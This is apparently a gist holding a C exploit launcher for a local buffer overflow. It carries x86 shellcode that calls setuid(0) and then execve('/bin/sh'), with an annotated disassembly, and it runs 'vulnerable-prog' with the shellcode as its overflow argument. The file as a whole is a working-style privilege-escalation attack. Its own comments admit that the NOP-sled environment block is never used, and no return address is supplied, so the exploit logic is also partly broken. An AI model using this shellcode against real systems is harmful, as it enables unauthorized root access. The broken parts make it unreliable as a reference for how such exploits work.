
@jacobcxdev
Created April 1, 2022 01:08
#include <unistd.h>
#include <stdio.h>
#include <string.h>
/*
 * Disassembled shellcode program (after doing some arrangements).
 * The listing is 32-bit x86 using the int 0x80 system-call convention
 * (eax = call number, ebx/ecx/edx = arguments); the bytes are exactly the
 * ones in the SHELLCODE macro below. Offsets are hexadecimal.
 *
 *  0: 31 c0           xor eax,eax                   -
 *  2: 31 db           xor ebx,ebx                   |--> system call 0xd5 (213) with ebx = 0
 *  4: b0 d5           mov al,0xd5                   |
 *  6: cd 80           int 0x80                      -
 *  8: eb 18           jmp 0x22                      -
 *  a: 5e              pop esi                       |
 *  b: 89 76 08        mov DWORD PTR [esi+0x8],esi   |
 *  e: 31 c0           xor eax,eax                   |
 * 10: 88 46 07        mov BYTE PTR [esi+0x7],al     |
 * 13: 89 46 0c        mov DWORD PTR [esi+0xc],eax   |
 * 16: b0 0b           mov al,0xb                    |--> Shellcode Assembly Code
 * 18: 89 f3           mov ebx,esi                   |
 * 1a: 8d 4e 08        lea ecx,[esi+0x8]             |
 * 1d: 8d 56 0c        lea edx,[esi+0xc]             |
 * 20: cd 80           int 0x80                      |
 * 22: e8 e3 ff ff ff  call 0xa                      |
 * 27: .ascii "/bin/sh<garbage>"                     -
 *
 * Reading the listing:
 *  - 0..6:  NOTE(review): 213 is setuid32 in the i386 system-call table, so
 *           this prologue looks like setuid(0) - confirm against the kernel
 *           headers of the target.
 *  - 8..22: the jmp/call/pop sequence leaves the address of the trailing
 *           string in esi. The code then writes a zero byte at esi+7 (right
 *           after the 7-character "/bin/sh"), stores esi at esi+8 and a zero
 *           dword at esi+0xc, and issues system call 0xb (11) with
 *           ebx = esi, ecx = esi+8, edx = esi+0xc.
 *           NOTE(review): 11 is execve on i386, which makes this
 *           execve("/bin/sh", {"/bin/sh", NULL}, {NULL}) - confirm.
 *  - The three stores land in the bytes that follow the string, so the code
 *    modifies its own memory region; it can only run from a mapping that is
 *    both writable and executable, which a non-executable stack / W^X policy
 *    does not provide.
 */
#define SHELLCODE "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"
/* Length of the environment string that main() assembles (terminator excluded). */
#define ENV_BLOCK_SIZE 127000
/* Capacity of the argv[1] buffer in main() (terminator excluded).
 * NOTE(review): presumably chosen relative to a buffer in the target program,
 * which is not shown here - confirm. */
#define OVF_BUF_SIZE 84
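/*
 * Test harness: builds an argument string from SHELLCODE and replaces the
 * current process with "vulnerable-prog", passing that string as argv[1] and
 * an empty environment.
 *
 * Returns 1 if execve() fails; on success execve() does not return.
 */
int main(void) {
    char envbuf[ENV_BLOCK_SIZE + 1];
    char ovfbuf[OVF_BUF_SIZE + 1];
    char *argv[3];
    char *envp[2];
    const size_t sc_len = strlen(SHELLCODE);
    /* Never copy more than the literal holds or the buffer can take. */
    const size_t copy_len = sc_len < (size_t)OVF_BUF_SIZE ? sc_len : (size_t)OVF_BUF_SIZE;

    /*
     * "SHELLCODE=" followed by 0x90 filler, with the SHELLCODE bytes placed
     * OVF_BUF_SIZE bytes before the end of the block.
     * NOTE(review): envbuf is not referenced again below - the envp array
     * handed to execve() is empty - so this block has no effect on the child.
     */
    memcpy(envbuf, "SHELLCODE=", 10);
    memset(envbuf + 10, 0x90, ENV_BLOCK_SIZE - 10 - sc_len);
    memcpy(envbuf + ENV_BLOCK_SIZE - OVF_BUF_SIZE, SHELLCODE, sc_len);
    envbuf[ENV_BLOCK_SIZE] = '\0';

    /*
     * The original loop indexed SHELLCODE[0..OVF_BUF_SIZE-1], which reads past
     * the end of the string literal (undefined behaviour). Zero-fill the
     * buffer and copy only the bytes the literal actually contains; the
     * resulting C string is the same one the old code produced up to its
     * first NUL.
     */
    memset(ovfbuf, 0, sizeof ovfbuf);
    memcpy(ovfbuf, SHELLCODE, copy_len);

    /* execve() does not search PATH: the name is resolved relative to the
     * current working directory. */
    argv[0] = "vulnerable-prog";
    argv[1] = ovfbuf;
    argv[2] = NULL;

    envp[0] = NULL;
    envp[1] = NULL;

    execve(argv[0], argv, envp);

    /* Only reached when execve() failed; report why instead of exiting 0. */
    perror("execve");
    return 1;
}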